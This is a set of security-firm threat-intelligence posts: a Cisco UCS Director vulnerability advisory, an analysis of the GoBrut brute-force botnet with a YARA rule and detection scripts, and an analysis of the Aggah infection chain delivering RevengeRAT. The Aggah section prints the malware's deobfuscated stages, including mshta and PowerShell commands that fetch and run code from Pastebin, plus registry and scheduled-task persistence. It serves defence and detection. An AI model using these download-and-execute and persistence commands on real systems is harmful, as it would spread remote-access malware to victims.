Serious Vulnerabilities in Cisco UCS Infrastructures

Proto: N020819.

With this notice, Yoroi wishes to inform you about the recent discovery of critical vulnerabilities in Cisco UCS Director, the main management software for data-center and private-cloud infrastructures based on Cisco Unified Computing. The issues are tracked as CVE-2019-1937, CVE-2019-1936 and CVE-2019-1935.

Due to several errors in the handling of user sessions and credentials, a remote, unauthenticated attacker can fully compromise the target machine. The cited issues allow this goal to be reached in two ways:

  1. By abusing the default credentials of the system user “scpuser”, which can also be used for SSH access (CVE-2019-1935).
  2. By chaining the vulnerabilities CVE-2019-1937 and CVE-2019-1936, which allow some user authentication checks to be bypassed and arbitrary commands to be executed because of missing input validation in the password-change servlets.

The vendor confirmed the issues through the bulletins CISCO-SA-20190821-IMCS-UCS-AUTHBY, CISCO-SA-20190821-IMCS-UCS-CMDINJ and CISCO-SA-20190821-IMCS-USERCRED, where the affected versions are listed:

Given the potential criticality of the affected infrastructures and the recent publication of technical details on the exploitation of these issues, Yoroi recommends first of all changing the credentials of the “scpuser” user through the form reachable from the “Administration > Users and Groups > SCP User Configuration” menu, then planning the installation of the available security updates, and verifying that any vulnerable services are reachable only from trusted networks.

Finally, Yoroi recommends keeping user awareness high, periodically warning users about ongoing threats, and relying on a team of experts to safeguard the security of the “cyber” perimeter. For a real-time threat index, please visit the following link: Yoroi Cyber Security Index

New GoBrut Version in the Wild

Introduction

Back in March we spotted and monitored a new emerging threat which we dubbed the GoBrut botnet. In our previous blog post, we analyzed a Windows version of this bot, discussing its use of the GoLang programming language, a modern language offering an extremely high level of code portability, which potentially enables attackers to write code once and compile it for every OS. That is exactly what happened: we discovered a new version of the bot compiled for Linux hosts.

This is not the first Linux-compatible GoBrut sample discovered in the wild; in fact, other security firms reported in April 2019 that version 2.24 of the bot had been compiled for Linux systems. Our recent discovery, instead, concerns an even newer version of the bot, version 3.06, again compiled for Linux environments.

For this reason, Cybaze-Yoroi ZLAB decided to dig into this new version of the Linux GoBrut bot.

Technical Analysis

Figure 1: Displayed malware version

During our intelligence monitoring operations, we encountered a compromised website containing a conspicuous number of suspicious files, in particular ELF binaries. The files were actually copies of the same unique sample.

Figure 2: List of the samples on the compromised website
Hash: 0f4755f65c495d3711bf22271f85f1ee86da8b7a487e770f769af56e189be48c
Threat: GoBrut
Brief Description: GoBrut Linux version 3.06
Ssdeep: 98304:EE1b80T1Mv8SzjLZ/YJG9MMa2megmG5OFZj8KIX:n980JpSzBsMa2ac8K

Table 1: Information about the GoBrut version 3.06

So, we proceeded to compare this latest sample with the previously known ones reported in the AlertLogic technical article.

Figure 3: Basic static information about the malware

The sample shares many similarities with the other known GoBrut samples, observed during both the static and the dynamic analysis sessions. For instance, the control flow and the communication protocol are the same, and the checking and retrieval of jobs show no major changes. In detail:

Figure 4: Registration to the C2

First, the sample registers itself with the C2 through the path “bots/knock”, indicating its kind of worker, the host OS and the version of the malware. The C2 responds with “1” as acknowledgement.

Figure 5: Check for updates

The malware reports its version and the target architecture to the C2, which answers with a simple “yes/no” response indicating whether an update is available.

Figure 6: Routine to retrieve the “Active Campaigns”

At the time of analysis, the only active project configured by the botnet operators was the “wpBrt” one, a “WordPress Brute Forcing” attack campaign configured to run dictionary attacks against over 270 thousand third-party websites.

Figure 7: Response of C2 with the JSON file containing the targets

Like all previous versions, this one retrieves the target list in JSON format and starts trying to log into the targets. At this point, we can summarize the observed behaviour of the GoBrut bot with the following diagram:

Figure 8: Sequence diagram of the GoBrut bot
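The registration, update check and target retrieval described above are plain HTTP exchanges, so the bot leaves traces in outbound proxy logs on the infected side and in web-server access logs on the attacked side. The following Python script is an added example written for this edition, not code from the original post or from the malware: it parses combined-log-format lines and flags (a) any request whose path contains the “bots/knock” registration endpoint and (b) sources sending an unusual number of POSTs to wp-login.php. The log lines, the threshold of 20 and the host name c2.invalid are constructed for the example; the query string of the real check-in is not documented here, so only the path is matched.

```python
import re
from collections import Counter

# Minimal parser for combined-log-format lines: source, timestamp, method, path, status.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Registration endpoint observed in the bot's "knock" request. Only the path is
# known from the analysis, so nothing is assumed about query parameters.
C2_KNOCK_RE = re.compile(r'/bots/knock(?:[/?]|$)')

WP_LOGIN_PATH = '/wp-login.php'
BRUTE_FORCE_THRESHOLD = 20   # POSTs from one source; assumed value, tune per site


def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_c2_checkins(lines):
    """Return (src, path) for every request that looks like a GoBrut registration."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec and C2_KNOCK_RE.search(rec['path']):
            hits.append((rec['src'], rec['path']))
    return hits


def find_wp_bruteforce(lines, threshold=BRUTE_FORCE_THRESHOLD):
    """Return {src: count} for sources with at least `threshold` POSTs to wp-login.php."""
    counts = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec and rec['method'] == 'POST' and rec['path'].split('?')[0] == WP_LOGIN_PATH:
            counts[rec['src']] += 1
    return {src: n for src, n in counts.items() if n >= threshold}


def sample_lines():
    """Constructed log lines (not real traffic): benign hits, one brute-force burst,
    a few legitimate login attempts and one outbound C2 knock seen through a proxy."""
    ts = '20/Aug/2019:10:00:%02d +0000'
    lines = ['203.0.113.9 - - [%s] "GET /index.php HTTP/1.1" 200 5123' % (ts % 1)]
    lines += ['198.51.100.23 - - [%s] "POST /wp-login.php HTTP/1.1" 200 3421' % (ts % (i % 60))
              for i in range(25)]
    lines += ['203.0.113.9 - - [%s] "POST /wp-login.php HTTP/1.1" 302 0' % (ts % 5)
              for _ in range(3)]
    lines.append('10.0.0.5 - - [%s] "POST http://c2.invalid/bots/knock HTTP/1.1" 200 1' % (ts % 7))
    return lines


if __name__ == '__main__':
    logs = sample_lines()
    print('C2 check-ins:', find_c2_checkins(logs))
    print('brute-force sources:', find_wp_bruteforce(logs))
```

The threshold is deliberately a parameter: a busy site with many editors will need a higher value or a per-minute window, while the knock rule needs no tuning because the path never appears in legitimate traffic.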

A Dangerous Upgrade

As previously mentioned, the behavior of the bot remained similar to the older versions. However, this new version has been made more powerful by the addition of new features. It has been equipped with new brute forcing modules, in particular:

The full set of modules can be found in the section “List of Workers”.

Target Distribution

As in our previous analysis, we collected the list of targets of the current botnet campaign and, at the time of writing, we identified more than 270k third-party destinations under attack.

Figure 9: Comparison of National TLD occurrences between February 2019 and August 2019

In addition to the “.com”, “.org” and “.info” domains, we notice that most TLDs refer to the EMEA region and, this time, almost no Russian TLD is present. This could mean, with low confidence, that the botnet operators may not want to run attacks against the Russian cyberspace, perhaps due to the possible Russian origin of their current clients.

Also, we found over 4600 domains under the Italian TLD in the target list of this GoBrut campaign. Most of them belong to Small-Medium Companies running WordPress-based websites, but there are also Law Firms and Non-Profit Associations. As described in our Collection #1 Analysis Whitepaper (ITA), these kinds of entities can also be targeted by criminals to exploit their relationships and reputation in order to reach more valuable targets such as Enterprises, Corporates or VIPs.

Conclusion

The active development of this botnet is another indicator of the increasing popularity of GoLang, even among malware writers. This trend has also been noticed by PaloAlto Unit42 in a technical article published back in January 2019, where they observed a significant increase in the number of GoLang-powered malware samples since 2016.

Moreover, the analysis of this StealthWorker/GoBrut version shows the increasing effort of the attackers in expanding their operations, supporting more technologies and adding further recon modules.

We also observed that the targets of this latest campaign are hundreds of thousands of WordPress-powered websites, part of which belong to the Italian economic fabric, confirming the increased dangerousness of the botnet along with the presence of ongoing malicious campaigns.

Indicators of Compromise 

Hashes

C2:

Yara Rules

import "elf"
rule GOBRUT_ELF_August_2019 {

    meta:
        description = "Yara Rule for GOBRUT ELF version"
        author = "Cybaze Zlab_Yoroi"
        last_updated = "2019-08-07"
        tlp = "white"
        category = "informational"

    strings:
        $h = {7F 45 4C 46}
        $a1 = "StealthWorker"
        $a2 = /Worker(\w+)_brut/
        $a3 = "github.com/go-pg"

    condition:
        all of them and elf.type == elf.ET_EXEC and elf.machine == elf.EM_386
}
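The rule above combines string matches with two fields of the ELF header (`elf.type` and `elf.machine`). The Python script below is an added example for this edition, not code from the original post or a replacement for the YARA rule: it re-implements the same condition by reading `e_type` and `e_machine` directly from the header (offsets 16 and 18, honouring the `EI_DATA` byte order flag) and, as a triage bonus, lists the `Worker<Name>_brut` module names embedded in the binary. The constants ET_EXEC = 2 and EM_386 = 3 are the standard ELF values that the YARA module exposes under those names; the sample image is constructed in the script and is not the real malware.

```python
import re
import struct

ELF_MAGIC = b'\x7fELF'
ET_EXEC = 2    # e_type for an executable image (elf.ET_EXEC in the YARA module)
EM_386 = 3     # e_machine for Intel 80386 (elf.EM_386 in the YARA module)

# Same patterns as the rule's $a1..$a3.
REQUIRED_STRINGS = (b'StealthWorker', b'github.com/go-pg')
WORKER_RE = re.compile(rb'Worker(\w+)_brut')
# Stricter pattern used only to pull out readable module names (e.g. "WP", "SSH").
NAME_RE = re.compile(rb'StealthWorker_Worker_?([A-Za-z0-9]+)_brut')


def elf_header_fields(data):
    """Return (e_type, e_machine) from a raw ELF image, or None if it is not ELF."""
    if len(data) < 20 or data[:4] != ELF_MAGIC:
        return None
    endian = '<' if data[5] == 1 else '>'      # EI_DATA: 1 = little, 2 = big endian
    e_type, e_machine = struct.unpack(endian + 'HH', data[16:20])
    return e_type, e_machine


def matches_gobrut_rule(data):
    """Mirror of the rule: all strings present, and a 32-bit x86 executable."""
    hdr = elf_header_fields(data)
    if hdr is None:
        return False
    e_type, e_machine = hdr
    return (all(s in data for s in REQUIRED_STRINGS)
            and WORKER_RE.search(data) is not None
            and e_type == ET_EXEC and e_machine == EM_386)


def worker_names(data):
    """Sorted, de-duplicated list of brute-force worker module names found in the image."""
    return sorted({m.group(1).decode() for m in NAME_RE.finditer(data)})


def constructed_sample():
    """A fake 32-bit little-endian ELF executable built for this example only.
    Go keeps function names NUL-terminated in the binary, which is imitated here."""
    e_ident = ELF_MAGIC + bytes([1, 1, 1, 0]) + b'\x00' * 8   # ELFCLASS32, LE, v1
    header = e_ident + struct.pack('<HH', ET_EXEC, EM_386) + b'\x00' * 32
    names = b'\x00'.join([
        b'StealthWorker_WorkerWP_brut_Worker',
        b'StealthWorker_WorkerSSH_brut_Brut',
        b'StealthWorker_Worker_WpInstall_finder_Worker',
        b'github.com/go-pg/pg',
    ])
    return header + names


if __name__ == '__main__':
    img = constructed_sample()
    print('rule match:', matches_gobrut_rule(img))
    print('worker modules:', worker_names(img))
```

Because the rule pins `EM_386`, an x86-64 build with the very same strings would not match; the test below flips `e_machine` to show that, which is the check to run before relying on the rule against future versions.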

List of Workers 

StealthWorker_WorkerPMA_check_DetectCMS
StealthWorker_WorkerPMA_check_Worker
StealthWorker_WorkerWP_check_userEnumerate
StealthWorker_WorkerWP_check_Worker
StealthWorker_WorkerWP_brut_checkBrutOk
StealthWorker_WorkerWP_brut__ptr_WP_Login
StealthWorker_WorkerWP_brut__ptr_WP_Login
StealthWorker_WorkerWP_brut_Worker
StealthWorker_WorkerWP_brut__ptr_WP_HttpClient
StealthWorker_WorkerWHM_check_DetectCMS
StealthWorker_WorkerWHM_check_Worker
StealthWorker_WorkerMagento_check_Worker
StealthWorker_WorkerMagento_check_saveGood
StealthWorker_WorkerJoomla_check_Worker
StealthWorker_WorkerJoomla_check_saveGood
StealthWorker_WorkerDrupal_check_Worker
StealthWorker_WorkerDrupal_check_saveGood
StealthWorker_WorkerCpanel_check_DetectCMS
StealthWorker_WorkerCpanel_check_Worker
StealthWorker_WorkerCpanel_check_saveGood
StealthWorker_WorkerFTP_check_ScanPort
StealthWorker_WorkerFTP_check_Worker
StealthWorker_WorkerFTP_check_saveGood
StealthWorker_WorkerPMA_brut__ptr_Instance_HttpClient
StealthWorker_WorkerPMA_brut__ptr_Instance_TryLogin
StealthWorker_WorkerPMA_brut__ptr_Instance_TryLogin
StealthWorker_WorkerPMA_brut_Instance_CheckSuccessFull
StealthWorker_WorkerPMA_brut_Worker
StealthWorker_WorkerPMA_brut__ptr_Instance_CheckSuccessFull
StealthWorker_WorkerCpanel_brut_Brut
StealthWorker_WorkerCpanel_brut_Worker
StealthWorker_WorkerWHM_brut_Brut
StealthWorker_WorkerMagento_brut_basicAuth
StealthWorker_WorkerMagento_brut_BrutRSS
StealthWorker_WorkerMagento_brut_BrutPanel
StealthWorker_WorkerMagento_brut_BrutDownloader
StealthWorker_WorkerMagento_brut_Worker
StealthWorker_WorkerJoomla_brut_Worker
StealthWorker_WorkerDrupal_brut__ptr_WP_Login
StealthWorker_WorkerDrupal_brut_Worker
StealthWorker_WorkerSSH_brut_Exe_cmd
StealthWorker_WorkerSSH_brut_check_honeypot
StealthWorker_WorkerSSH_brut_Brut
StealthWorker_WorkerSSH_brut_Worker
StealthWorker_WorkerSSH_brut_SaveGood
StealthWorker_WorkerSSH_brut_Exe_cmd_func1
StealthWorker_WorkerFTP_brut_Brut
StealthWorker_WorkerFTP_brut_SaveGood
StealthWorker_WorkerFTP_brut_CheckFalsePositive
StealthWorker_WorkerFTP_brut_Worker
StealthWorker_WorkerFTP_brut_Worker_func1
StealthWorker_WorkerMysql_brut_Brut
StealthWorker_WorkerMysql_brut_Worker
StealthWorker_WorkerPostgres_brut_Brut
StealthWorker_WorkerPostgres_brut_Worker
StealthWorker_WorkerPostgres_brut_SaveGood
StealthWorker_WorkerBackup_finder_HttpCheck
StealthWorker_WorkerBackup_finder_Worker
StealthWorker_WorkerBitrix_brut__ptr_WP_Login
StealthWorker_WorkerBitrix_brut_SaveGood
StealthWorker_WorkerBitrix_brut_Worker
StealthWorker_WorkerBitrix_brut__ptr_WP_HttpClient
StealthWorker_WorkerBitrix_check_Worker
StealthWorker_WorkerOpencart_check_Worker
StealthWorker_WorkerOpencart_brut_Worker
StealthWorker_WorkerOpencart_brut_newfileUploadRequest
StealthWorker_WorkerOpencart_brut__ptr_WP_HttpClient
StealthWorker_WorkerHtpasswd_check_Worker
StealthWorker_WorkerHtpasswd_brut_SaveGood
StealthWorker_WorkerHtpasswd_brut_Worker
StealthWorker_WorkerAdminFinder_GetPage
StealthWorker_WorkerAdminFinder_SaveGood
StealthWorker_WorkerAdminFinder_Worker
StealthWorker_Worker_WpInstall_finder_Worker
StealthWorker_Worker_WpInstall_finder_saveGood
StealthWorker_Worker_wpMagOcart_Worker
StealthWorker_Worker_WooChk_userEnumerate
StealthWorker_Worker_WooChk_Worker
StealthWorker_Worker_WooChk_saveGood
StealthWorker_WorkerQnap_check_Worker
StealthWorker_WorkerQnap_check_saveGood
StealthWorker_WorkerQnap_brut_SaveGood
StealthWorker_WorkerQnap_brut_Worker
StealthWorker_WorkerQnap_brut_newfileUploadRequest
StealthWorker_WorkerQnap_brut_HttpClient

This blog post was authored by Luigi Martire, Davide Testa and Luca Mella of Cybaze-Yoroi Z-LAB

Infected PEC Email Campaign (sLoad)

Proto: N010819.

With this notice, Yoroi wishes to inform you about the recent detection of a new dangerous campaign targeting Italian organizations and companies. The infected messages are delivered via certified email (PEC) and invite the victim to review correspondence supposedly exchanged between the victim and hypothetical institutions. The emails contain links that download a malicious archive capable of infecting the victim with a malware implant of the sLoad family (TH-163).

Figure. Example of a malicious PEC email

The indicators of compromise gathered during the investigations are reported below:

Finally, Yoroi recommends keeping user awareness high, periodically warning users about ongoing threats, and relying on a team of experts to safeguard the security of the “cyber” perimeter. For a real-time threat index, please visit the following link: Yoroi Cyber Security Index

The Evolution of Aggah: From Roma225 to the RG Campaign

Introduction

A few months ago we started observing a cyber operation aiming to attack private companies in various business sectors, from automotive to luxury, education, and media/marketing. The attribution of the attack is still unclear, but the large scale of the malicious activities has also been confirmed by Unit42, who reported attack attempts against government verticals too.

The attacks are characterized by the usage of a Remote Access Trojan named “RevengeRat”, suggesting a possible, still unconfirmed and under investigation, connection with the Gorgon Group, a known mercenary APT group that ran cyber-espionage operations and was involved in criminal activities too.

A few weeks ago, Unit42 discovered another active campaign, compatible with the Roma225 one we tracked in December 2018, pointing to some interesting changes in the attackers' TTPs. Recently, we intercepted other attacks potentially related to this wider criminal operation. For this reason, the Cybaze-Yoroi ZLab team decided to analyze this recent campaign in order to investigate the evolution of the Aggah threat.

Technical Analysis

The whole infection chain shows an interesting degree of sophistication, leveraging about seventeen stages: a non-negligible number of steps put in place to decouple the infection vector from the actual payload. The following infographic summarizes the infection chain dissected in the sections below, starting from the weaponized Office document, initially delivered through malicious emails, to the final RevengeRAT payload.

Figure 1. “RG” campaign infection chain

The Macro Dropper

Hash: 7c0a69f93831dcd550999b765c7922392dd0d994b0241071545749e865cc9854
Threat: Dropper
Brief Description: XLS Macro dropper
Ssdeep: 768:kCSk3hOdsylKlgxopeiBNhZFGzE+cL2kdAJ7evT8RsFbQ:kDk3hOdsylKlgxopeiBNhZFGzE+cL2kt

Table 1: Information about the RevengeRAT malicious macro dropper

The whole infection starts with a malicious XLS document weaponized with an embedded macro. The VB code is polluted by a multitude of junk instructions; after a cleaning phase we isolated the essence of the malicious code.

Public Function Workbook_Open()
    ' Three shifted fragments are decoded and concatenated into the command line to run
    rgh1 = YUcIFcEAA("tzo{h'o{{wA66ip", "7")
    rgh2 = YUcIFcEAA("{5s€6", "7")
    rgh3 = YUcIFcEAA("7O^7ixXmxmxm", "5")
    rgh = rgh1 + rgh2 + rgh3
    Shell rgh
End Function

Public Function YUcIFcEAA(Sg1NdPNeR As String, jxvMDn0vV As Integer)
    ' Subtract the key from the character code of every character in the string
    Dim PFc88so50 As Integer
    For PFc88so50 = 1 To Len(Sg1NdPNeR)
        Mid(Sg1NdPNeR, PFc88so50, 1) = Chr(Asc(Mid(Sg1NdPNeR, PFc88so50, 1)) - jxvMDn0vV)
    Next PFc88so50
    YUcIFcEAA = Sg1NdPNeR
End Function

Code Snippet 1: real core of the macro

Figure 2: Command used to start the infection

A quick and dirty manipulation of the script enabled us to easily bypass the code obfuscation techniques protecting the next stage of the infection: the invocation of a Microsoft HTML Application hosted in a remote location.

The macro has the sole purpose of running the mshta command. As defined by MITRE, “Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension .hta. HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser.”

The Hidden HTA

The malware retrieves the HTA application to run from a remote host behind the Bitly shortening service. The target page is “rg.html”, downloaded from “https[://createdbymewithdeniss[ .blogspot[.com/p/rg[.html”. Even in this case, as in the Roma225 campaign, the attacker abused the Blogger platform to hide the malicious code in plain sight.

Figure 3: Fake Blogspot page

The page does not embed any binaries or malicious links, but inspecting its source code reveals packed HTML code dynamically injected into the page during rendering.

Figure 4: Malicious code contained in the malicious “blogspot” site

This additional piece of script is specifically designed to be executed by the “mshta” utility. It is VBScript code creating a “WScript.Shell” object, an object decidedly not designed to be loaded into regular web browser engines.

<script language="VBScript">
Set Xkasdj2 = CreateObject(StrReverse(StrReverse("WScript.Shell")))
Xa_aw1 = StrReverse(StrReverse("h")) + StrReverse(StrReverse(StrReverse(StrReverse("t")))) + StrReverse(StrReverse(StrReverse(StrReverse("t")))) + StrReverse(StrReverse("p")) + StrReverse(":") + StrReverse(StrReverse(StrReverse(StrReverse("/")))) + StrReverse(StrReverse(StrReverse(StrReverse("/")))) + StrReverse(StrReverse(StrReverse(StrReverse("w")))) + StrReverse(StrReverse(StrReverse(StrReverse("w")))) + StrReverse(StrReverse(StrReverse(StrReverse("w")))) + StrReverse(StrReverse(".")) + StrReverse(StrReverse("p")) + StrReverse(StrReverse("a")) + StrReverse(StrReverse("s")) + StrReverse(StrReverse(StrReverse(StrReverse("t")))) + StrReverse("e") + StrReverse("b") + StrReverse("i") + StrReverse("n") + StrReverse(StrReverse(".")) + StrReverse("c") + StrReverse("o") + StrReverse(StrReverse("m")) + StrReverse(StrReverse(StrReverse(StrReverse("/")))) + StrReverse("r") + StrReverse(StrReverse("a")) + StrReverse(StrReverse(StrReverse(StrReverse("w")))) + StrReverse(StrReverse(StrReverse(StrReverse("/"))))
Xa_aw0 = StrReverse(StrReverse("m")) + StrReverse(StrReverse("s")) + StrReverse(StrReverse("h")) + StrReverse(StrReverse(StrReverse(StrReverse("t")))) + StrReverse(" a")
Xa_aw2 = "efZDG7aL"
XXX = Xa_aw0 + Xa_aw1 + Xa_aw2
Morg = XXX
Xa_aw = Morg
Xkasdj2.Run Xa_aw, vbHide
self.close
</script>

Code Snippet 2: Javascript code after “unescape” function

The VBScript code is obfuscated using a series of “StrReverse” functions. But the action it performs is still clearly evident: call another mshta process and execute a new HTA application hosted on Pastebin (hxxp[://pastebin[.com/raw/efZDG7aL).

Figure 5: Malicious code stored on pastebin

This other script is also encoded in hexadecimal format. After decoding, its content can be divided into four parts. The first one is responsible for killing some of the Microsoft Office suite processes, like Word, Excel, Publisher and PowerPoint.

“cmd.exe /c taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE”

Code Snippet 3: First deobfuscated piece of code

Instead, the second chunk hides the next malware stage invocation within a Powershell script.

powershell.exe $LOLO=@(91,118,111,105,100,93,32,91,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,65,115,115,101,109,98,108,121,93,58,58,76,111,97,100,87,105,116,104,80,97,114,116,105,97,108,78,97,109,101,40,39,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,39,41,59,36,102,106,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,110,108,111,97,100,83,116,114,105,110,103,39,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,115,58,47,47,112,97,115,116,101,98,105,110,46,99,111,109,47,114,97,119,47,67,77,50,50,118,84,117,112,39,41,124,73,69,88,59,91,66,121,116,101,91,93,93,36,102,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,110,108,111,97,100,83,116,114,105,110,103,39,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,115,58,47,47,112,97,115,116,101,98,105,110,46,99,111,109,47,114,97,119,47,81,120,48,75,50,98,97,78,39,41,46,114,101,112,108,97,99,101,40,39,94,39,44,39,48,120,39,41,124,73,69,88,59,91,107,46,72,97,99,107,105,116,117,112,93,58,58,101,120,101,40,39,77,83,66,117,105,108,100,46,101,120,101,39,44,36,102,41);[System.Text.Encoding]::ASCII.GetString($LOLO)|IEX

Code Snippet 4: Second deobfuscated piece of code

This code snippet hides a PowerShell stage encoded as a list of character codes. The corresponding ASCII text is then executed through the IEX cmdlet.

[void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://pastebin[.com/raw/CM22vTup')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://pastebin[.com/raw/Qx0K2baN').replace('^','0x')|IEX;[k.Hackitup]::exe('MSBuild.exe',$f)

Code Snippet 5: Deobfuscated powershell function

This code builds up the core of the malware implant (discussed in the next section). The third chunk of the code, instead, is where the attacker sets up two different persistence mechanisms. Each of them invokes a different HTA application retrieved from Pastebin:

Set Xm_w = CreateObject("WScript.Shell")
L_Xe = "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AvastUpdate"
Xm_w.RegWrite L_Xe,"mshta.exe http://pastebin[.com/raw/bMJxXtXa","REG_EXPAND_SZ"

Code Snippet 6: Third deobfuscated piece of code (part 1)

Set Mi_G = CreateObject(StrReverse(StrReverse("WScript.Shell")))
Dim We_wW
We_wW0 = StrReverse("t/ 03 om/ ETUNIM cs/ etaerc/ sksathcs")
We_wW1 = "n ""Windows Update"" /tr ""mshta.ex"
We_wW2 = "e h" + "t" + "t" + "p" + ":" + "/" + "/" + "p" + "a" + "s" + "t" + "e" + "b" + "i" + "n" + "." + "c" + "o" + "m" + "/" + "r" + "a" + "w" + "/tuGAsMze"" /F "
We_wW = We_wW0 + We_wW1 + We_wW2
Mi_G.Run We_wW, vbHide

Code Snippet 7: Third deobfuscated piece of code (part 2)

Both scripts are stored on the Pastebin platform, and even though the first one has been removed, the malware maintains its persistence thanks to the execution of the second method.

The last chunk of code, the fourth, contains a huge number of Registry keys ready to be set on the target machine. This behavior has been implemented to drastically reduce the defenses of the target host, for instance by disabling security features of Microsoft Windows and the Office ecosystem. The “Edited Registry Keys” section reports them.

The Hagga Pastes

As stated in the previous section, Code Snippet 5 contains the core of the malicious actions. The malware concurrently downloads and executes PowerShell code from two pastes. The first one is "CM22vTup" and has been published by a Pastebin user named “HAGGA”, the same one reported in the PaloAlto analysis.

Figure 6: New payload downloaded from Pastebin

As previously hinted, the PowerShell code in the “CM22vTup” snippet encodes its payload in numeric format. Decoding “PAYLOAD-1”, another obfuscated PowerShell script reveals the loading of a shellcode directly into the running process memory.

$jk=@(PAYLOAD-1);$p=[System.Text.Encoding]::ASCII.GetString($jk)|IEX

Code Snippet 8: Code structure of the downloaded script

[Byte[]]$sc64=iex('PAYLOAD_2'.replace('%_','0x'));$a = [Microsoft.VisualBasic.Interaction]::CallByname([AppDomain]::CurrentDomain,'Load',[Microsoft.VisualBasic.CallType]::Method,$sc64)

Code Snippet 9: Structure of the script contained in “PAYLOAD_1”

After a basic manipulation, the data hidden in “PAYLOAD_2” turns out to be the hexadecimal representation of a PE file, easily recognizable thanks to the characteristic “4D 5A” header.

%_4D,%_5A,%_90,%_00,%_03,%_00,%_00,%_00,%_04,%_00,%_00,%_00,%_FF,%_FF,%_00,%_00,%_B8,%_00,%_00,%_00,%_00,%_00, [.....]

Code Snippet 10: “PAYLOAD_2” in hex encoding
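The chain uses four cheap encodings in sequence: the macro's per-character shift (Code Snippet 1), the nested StrReverse calls of the HTA (Code Snippet 2 and Snippet 7), PowerShell arrays of character codes (Snippets 4, 8) and comma-separated hex tokens with a `%_` or `^` prefix in place of `0x` (Snippets 5, 9, 10). The Python helpers below are an added example for this edition, not code from the original post: each function undoes one layer, and the last check confirms the decoded bytes carry the “4D 5A” header the post points out. The inputs in the usage section are taken from the snippets above or constructed; the StrReverse simplifier handles plain `"..."` literals and would need extending for VB's doubled-quote escapes.

```python
import re


# --- Layer 1: the macro's character-shift routine (YUcIFcEAA) --------------
def vba_shift_decode(text, shift):
    """Undo YUcIFcEAA: each character of the stored string was shifted up by `shift`."""
    return ''.join(chr(ord(c) - shift) for c in text)


# --- Layer 2: VBScript StrReverse() nesting and "a" + "b" concatenation ------
_STRREV = re.compile(r'StrReverse\("([^"]*)"\)')
_CONCAT = re.compile(r'"([^"]*)"\s*\+\s*"([^"]*)"')


def simplify_strreverse(expr):
    """Collapse StrReverse("lit") calls from the inside out, then join adjacent
    literals. Two nested calls cancel; an odd nesting depth reverses the literal."""
    prev = None
    while prev != expr:
        prev = expr
        expr = _STRREV.sub(lambda m: '"' + m.group(1)[::-1] + '"', expr)
    prev = None
    while prev != expr:
        prev = expr
        expr = _CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', expr)
    return expr


# --- Layer 3: PowerShell @(91,118,...) character-code arrays -----------------
_NUM_ARRAY = re.compile(r'@\(([\d,\s]+)\)')


def decode_numeric_array(ps_fragment):
    """Return the text hidden in the first @( n, n, ... ) array of a PowerShell fragment."""
    m = _NUM_ARRAY.search(ps_fragment)
    if not m:
        raise ValueError('no @( ... ) numeric array found')
    return ''.join(chr(int(n)) for n in m.group(1).split(',') if n.strip())


# --- Layer 4: '%_4D,%_5A,...' (or '^4D,...') prefixed hex lists --------------
def decode_prefixed_hex(payload, prefix):
    """Rebuild raw bytes from a comma-separated list of prefix+hex tokens."""
    out = bytearray()
    for tok in payload.split(','):
        tok = tok.strip()
        if not tok:
            continue
        if not tok.startswith(prefix):
            raise ValueError('unexpected token: %r' % tok)
        out.append(int(tok[len(prefix):], 16))
    return bytes(out)


def looks_like_pe(blob):
    """True when the decoded blob starts with the DOS 'MZ' header (bytes 4D 5A)."""
    return blob[:2] == b'MZ'


if __name__ == '__main__':
    # First five characters of rgh1 in Code Snippet 1, key 7.
    print(vba_shift_decode("tzo{h", 7))
    # We_wW0 from Code Snippet 7.
    print(simplify_strreverse('StrReverse("t/ 03 om/ ETUNIM cs/ etaerc/ sksathcs")'))
    # Opening of the array in Code Snippet 4.
    print(decode_numeric_array('$LOLO=@(91,118,111,105,100,93)'))
    # Opening of PAYLOAD_2 in Code Snippet 10.
    blob = decode_prefixed_hex('%_4D,%_5A,%_90,%_00', '%_')
    print(blob, looks_like_pe(blob))
```

Running the file prints `mshta`, the scheduled-task command hidden in We_wW0, `[void]` and `b'MZ\x90\x00' True`, which is enough to confirm each layer is handled before pointing the helpers at the full pastes.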

This PE32 file is a well-formed .NET assembly. The following table shows its static information.

Hash: 84833991f1705a01a11149c9d037c8379a9c2d463dc30a2fec27bfa52d218fa6
Threat: RevengeRAT / Injector
Brief Description: RevengeRAT / injector payload, obfuscated
